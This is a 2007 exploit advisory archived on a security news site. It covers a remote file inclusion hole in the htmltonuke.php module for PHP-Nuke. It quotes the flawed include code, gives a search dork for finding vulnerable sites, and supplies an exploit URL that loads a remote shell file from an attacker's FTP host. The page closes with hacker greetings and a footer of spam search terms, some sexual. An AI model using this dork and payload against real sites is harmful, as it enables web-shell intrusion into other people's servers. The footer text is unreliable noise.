about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln




2007-03-20 PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln
Rated as : Moderate Risk

######################################################
#
# htmltonuke 2.0alpha for postnuke & PHP-Nuke(htmltonuke.php) Remote File
Include Vulnerabilities
#
######################################################
#
# script :http://www.desarrollonuke.org
#         http://up.9q9q.net/up/index.php?f=ddAvVTUSs
#
######################################################
#
# file :  /htmltonuke.php
#
######################################################
#
# Dork : "/nuke/htmltonuke.php" - "htmltonuke.php"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com ,
http://hack-teach.com/
#
######################################################
# //verifie s'il y a l'extension ".htm"
# if(substr($filnavn,-4)!=".htm" &&
substr($filnavn,-5)!=".html" ){
#       echo "Only files HTML are authorized...";
#       CloseTable();
#       include("footer.php");
# }
# else {
#       // verifie si l'on remonte dans l'arborescense
#       // verifie si l'on sort du site
#       if( substr($filnavn,0,5)!="./../" &&
substr($filnavn,0,7)!="http://" ){
#               include ($filnavn);
#               CloseTable();
#               include("footer.php");
#       }
#
######################################################
#
# exploit :
http://www.example.com/nuke_path/htmltonuke.php?filnavn=ftp://user:pass@evilsite.com/public_html/shell.html
(or) .htm
#
######################################################

----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The
Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| |
020 | | abdulla00 " alz3eem" | | The_Viper | All i know

#Big Thx For : www.4azhar.com ,  Long Life My HomeLand Palestine
securitydot.net - 2007-03-20

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 09:51:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo www.guzw.n www.guzw.n mambo+Remo www.xlooo. CMS is Fre logmeon mambo+Remo SREYASEX.C index /component www.1314bn barracuda php ads Guardian www.guzw.n www.guzw.n fuckgrils. IceWarp We c...sgalle SRI+LANKAN www.guzw.n SREYASEX.C 9389938.ys galire hi.baidu.c niuniujidi www.guzw.n jshuwei.or 30metri.co www.guzw.n Incest 3gp www.guzw.n tina sex mysmiles mambo Remo Spider man main.php?s www.guzw.n squid web ronaldenho B...tman.h Bia 2 rap. news for c www.guzw.n www.guzw.n 52cpp.com zeroboard. Apache ht zn8398.com